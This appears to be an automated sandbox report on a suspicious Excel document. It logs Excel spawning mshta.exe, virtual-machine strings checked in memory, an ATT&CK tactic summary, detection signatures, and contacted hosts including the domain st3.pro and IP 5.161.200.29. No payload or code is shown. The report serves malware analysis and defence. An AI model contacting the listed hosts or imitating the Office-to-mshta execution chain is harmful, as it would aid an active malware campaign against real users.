Source: C:\Windows\System32\WerFault.exe | Process created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /restore
Source: unknown | Process created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\COTA#U00c7#U00c3O.xls"
Source: C:\Windows\System32\mshta.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: c2r64.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msvcp140.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: COTA#U00c7#U00c3O.xlsInitial sample: OLE indicators encrypted = True
Source: Amcache.hve.LOG1.10.drBinary or memory string: bcdedit.exe|ac227fd116781fea
Source: Amcache.hve.LOG1.10.drBinary or memory string: c:\windows\system32\bcdedit.exe
Source: Amcache.hve.LOG1.10.drBinary or memory string: bcdedit.exe
Source: Amcache.hve.10.drBinary or memory string: bcdedit.exe|ac227fd116781fea
Source: Amcache.hve.10.drBinary or memory string: c:\windows\system32\bcdedit.exe
Source: Amcache.hve.10.drBinary or memory string: bcdedit.exe
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: COTA#U00c7#U00c3O.xls Stream path 'Workbook' entropy: 7.99836815431 (max. 8.0)
Source: C:\Windows\splwow64.exe Thread delayed: delay time: 120000
Source: EXCEL.EXE, 00000000.00000002.4110404206.00000121CA3DC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
Source: EXCEL.EXE, 00000000.00000002.4113938463.00000121D7B43000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMWare, Inc.
Source: EXCEL.EXE, 00000000.00000002.4110404206.00000121CA3DC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware20,1
Source: EXCEL.EXE, 00000000.00000002.4110404206.00000121CA333000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: amneVMware-42 27 fa b8 1c 1
Source: EXCEL.EXE, 00000000.00000002.4109988686.00000121CA030000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: EXCEL.EXE, 00000000.00000002.4113441379.00000121D7820000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWf
Source: EXCEL.EXE, 00000000.00000002.4110404206.00000121CA333000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware-42 27 fa b8 1c 1
Source: EXCEL.EXE, 00000000.00000002.4109988686.00000121CA0AC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-USn
Source: EXCEL.EXE, 00000000.00000002.4110404206.00000121CA333000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SVGA IIES1371
Source: EXCEL.EXE, 00000000.00000002.4110404206.00000121CA333000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process information queried: ProcessInformation
Source: Amcache.hve.LOG1.10.dr, Amcache.hve.10.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.LOG1.10.dr, Amcache.hve.10.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.LOG1.10.dr, Amcache.hve.10.dr Binary or memory string: MsMpEng.exe
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 13 Exploitation for Client Execution; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: 1 Scripting; 1 Bootkit; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 2 Masquerading; 1 Virtualization/Sandbox Evasion; 1 Process Injection; 1 Obfuscated Files or Information; 1 Bootkit; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 11 Security Software Discovery; 1 Process Discovery; 1 Virtualization/Sandbox Evasion; 1 File and Directory Discovery; 2 System Information Discovery; Wi-Fi Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Email Collection; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 1 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph ID: 1634262, Sample: COTA#U00c7#U00c3O.xls, Startdate: 10/03/2025, Architecture: WINDOWS, Score: 56
Signatures: Multi AV Scanner detection for submitted file; Document exploit detected (process start blacklist hit); Sigma detected: Suspicious Microsoft Office Child Process
DNS/IP: star-azurefd-prod.trafficmanager.net; st3.pro; 15 other IPs or domains
Processes: EXCEL.EXE started WerFault.exe, splwow64.exe, mshta.exe and a second WerFault.exe; the first WerFault.exe started EXCEL.EXE; a separate EXCEL.EXE instance was also started
EXCEL.EXE DNS/IP: s-part-0048.t-0009.t-msedge.net 13.107.246.76 (443, 49943, 49944; MICROSOFT-CORP-MSN-AS-BLOCK, US, United States); st3.pro 5.161.200.29 (443, 49937; HETZNER-AS, DE, Germany); 2 other IPs or domains
